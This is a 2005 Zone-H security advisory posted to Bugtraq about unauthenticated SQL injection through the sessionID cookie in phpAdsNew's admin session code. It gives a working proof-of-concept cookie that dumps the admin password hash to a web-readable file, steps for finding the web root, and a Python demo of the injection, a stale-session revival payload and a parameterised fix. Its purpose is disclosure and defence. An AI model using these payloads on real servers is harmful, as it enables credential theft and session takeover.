ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities

From: Siegfried (siegfri3d_at_gmail.com)
Date: 11/11/05

    Date: Fri, 11 Nov 2005 07:45:44 +0100
    To: bugtraq@securityfocus.com


    ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities

    Zone-H Research Center Security Advisory 200502
    http://www.zone-h.fr

    Date of release: 11/11/2005
    Software: phpAdsNew (www.phpadsnew.com)
    Affected versions:
    <= 2.0.6
    2.0.7rc1 (latest CVS snapshot)
    Risk: Medium
    Discovered by: Kevin Fernandez "Siegfried" from the Zone-H Research Team

    Background (from their web site)
    ----------
    phpAdsNew is an open-source ad server, with an integrated banner
    management interface and tracking system for gathering statistics.
    With phpAdsNew you can easily rotate paid banners and your own
    in-house advertisements. You can even integrate banners from third
    party advertising companies.

    Details
    --------
    Toni Koivunen published an advisory yesterday regarding a
    vulnerability exploitable via /admin/logout.php that can be used to
    delete arbitrary data (and perhaps more). However, more SQL injections
    are present in this part of the code: none of the functions in
    /admin/lib-sessions.inc.php check the "sessionID" value taken from the
    cookie before using it in a query. The most interesting one is
    phpAds_SessionDataFetch(), because it is called from config.php and
    builds a simple SELECT query from the raw cookie value.

    Snip (no prior check on the cookie value):

        if (isset($HTTP_COOKIE_VARS['sessionID']) && $HTTP_COOKIE_VARS['sessionID'] != '')
        {
            $result = phpAds_dbQuery("SELECT sessiondata FROM ".$phpAds_config['tbl_session'].
                                     " WHERE sessionid='".$HTTP_COOKIE_VARS['sessionID']."'" .
                                     " AND UNIX_TIMESTAMP(NOW())-UNIX_TIMESTAMP(lastused) < 3600"); <-- ouch

    Since /admin/config.php is included by /admin/index.php, no
    authentication is needed to reach the vulnerable query.

    PoC (cookie):
    sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into
    outfile "/var/www/blah.txt"/*;

    The single quote closes the sessionid string, the UNION appends the
    admin password hash from the phpads_config table, and the trailing /*
    comments out the rest of the original query (including the lastused
    check). Note that INTO OUTFILE only succeeds if the MySQL user has the
    FILE privilege and the server process can write to the target
    directory, and the file must land somewhere the web server will serve.

    Trigger one of the many PHP errors in the application to disclose the
    web root path (needed for the outfile location), then open
    /admin/index.php with that cookie set.
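    The following is an added example, not code from the advisory or from
    phpAdsNew. It rebuilds the query exactly as phpAds_SessionDataFetch()
    does (string concatenation of the cookie value) against an in-memory
    SQLite database that stands in for the MySQL tables named above, and
    shows the cookie from the PoC returning admin_pw and the commented-out
    lastused check reviving a stale session. The table contents, the
    session ID format used for the allow-list (32 lowercase hex characters)
    and the hardened function are assumptions for illustration; the MySQL-only
    INTO OUTFILE clause is dropped because SQLite cannot write files.

    ```python
    import re
    import sqlite3
    import time

    # Constructed sample data: one live session row, one stale row, one admin hash.
    VALID_SESSION_ID = "0123456789abcdef0123456789abcdef"
    STALE_SESSION_ID = "ffffffffffffffffffffffffffffffff"
    ADMIN_PW_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


    def build_db():
        """In-memory SQLite stand-in for the two MySQL tables the advisory names."""
        conn = sqlite3.connect(":memory:")
        conn.executescript("""
            CREATE TABLE phpads_session (sessionid TEXT, sessiondata TEXT, lastused INTEGER);
            CREATE TABLE phpads_config  (admin TEXT, admin_pw TEXT);
        """)
        now = int(time.time())
        conn.execute("INSERT INTO phpads_session VALUES (?, ?, ?)",
                     (VALID_SESSION_ID, 'a:1:{s:5:"admin";b:1;}', now))
        conn.execute("INSERT INTO phpads_session VALUES (?, ?, ?)",
                     (STALE_SESSION_ID, "stale", now - 7200))  # expired two hours ago
        conn.execute("INSERT INTO phpads_config VALUES (?, ?)", ("admin", ADMIN_PW_HASH))
        conn.commit()
        return conn


    def session_data_fetch_vulnerable(conn, cookie_session_id):
        """Mirrors phpAds_SessionDataFetch(): the raw cookie value is concatenated into the SQL."""
        sql = ("SELECT sessiondata FROM phpads_session"
               " WHERE sessionid='" + cookie_session_id + "'"
               " AND CAST(strftime('%s','now') AS INTEGER) - lastused < 3600")
        return [row[0] for row in conn.execute(sql)]


    # Assumption (not from the advisory): phpAdsNew session IDs are 32 lowercase hex chars.
    SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")


    def session_data_fetch_hardened(conn, cookie_session_id):
        """Allow-list the cookie value, then bind it as a parameter instead of concatenating."""
        if not SESSION_ID_RE.fullmatch(cookie_session_id):
            return []  # anything outside the expected format never reaches the database
        sql = ("SELECT sessiondata FROM phpads_session WHERE sessionid=?"
               " AND CAST(strftime('%s','now') AS INTEGER) - lastused < 3600")
        return [row[0] for row in conn.execute(sql, (cookie_session_id,))]


    # The advisory's cookie without the MySQL-only "into outfile" part.
    INJECTED_COOKIE = "adsds'/**/UNION/**/SELECT admin_pw from phpads_config/*"

    # A known-but-expired session ID: the trailing /* strips the lastused check.
    STALE_REVIVAL_COOKIE = STALE_SESSION_ID + "'/*"

    if __name__ == "__main__":
        db = build_db()
        print("vulnerable, injected cookie:", session_data_fetch_vulnerable(db, INJECTED_COOKIE))
        print("vulnerable, stale revival:  ", session_data_fetch_vulnerable(db, STALE_REVIVAL_COOKIE))
        print("hardened, injected cookie:  ", session_data_fetch_hardened(db, INJECTED_COOKIE))
        print("hardened, valid session:    ", session_data_fetch_hardened(db, VALID_SESSION_ID))
    ```

    The vulnerable path returns the admin hash for the injected cookie and
    the expired session's data for the stale-revival cookie; the hardened
    path rejects both at the allow-list check and still returns the
    legitimate session's data unchanged.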

    Solution
    ---------
    No vendor patch at the time of release.

    Validate the "sessionID" cookie in every affected function of
    /admin/lib-sessions.inc.php before it is placed in a query: restrict it
    to the character set the application itself generates, or at minimum
    escape it with the database's quoting function.

    Original advisories:
    English version: http://www.zone-h.org/en/advisories/read/id=8413/
    French: http://www.zone-h.fr/fr/advisories/read/id=674/
